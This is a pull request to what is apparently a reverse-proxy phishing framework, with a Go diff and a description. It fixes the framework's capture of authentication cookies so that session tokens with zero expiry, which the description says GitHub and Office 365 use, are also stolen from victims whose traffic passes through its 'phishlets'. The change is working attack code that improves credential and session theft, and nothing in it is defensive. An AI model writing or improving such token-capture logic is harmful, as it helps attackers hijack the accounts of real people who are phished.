### PR TITLE
fixed token capture logic for tokens with expiry set to 0

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -683,7 +683,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 					if pl.isAuthToken(c_domain, ck.Name) {
 						s, ok := p.sessions[ps.SessionId]
 						if ok && (s.IsAuthUrl || !s.IsDone) {
-							if ck.Value != "" && (!ck.Expires.IsZero() && time.Now().Before(ck.Expires)) { // cookies with empty values or expired cookies are of no interest to us
+							if ck.Value != "" && (ck.Expires.IsZero() || (!ck.Expires.IsZero() && time.Now().Before(ck.Expires))) { // cookies with empty values or expired cookies are of no interest to us
 								is_auth = s.AddAuthToken(c_domain, ck.Name, ck.Value, ck.Path, ck.HttpOnly, auth_tokens)
 								if len(pl.authUrls) > 0 {
 									is_auth = false


### PR DESCRIPTION
The new logic to avoid capturing empty or expired cookies was missing the case where the cookie expiry is set to 0 (cookie to be deleted by browser on exit). That is a common value for session tokens and is used by GitHub, Office 365, etc., so the existing logic broke token capture for those phishlets.

This pull request fixes the logic such that:
- the cookie cannot be empty
- the cookie cannot be expired (but can be zero)

This is accomplished by checking for cookies that are set to zero expiry and allowing them. If they are not zero, then the expiry must be in the future.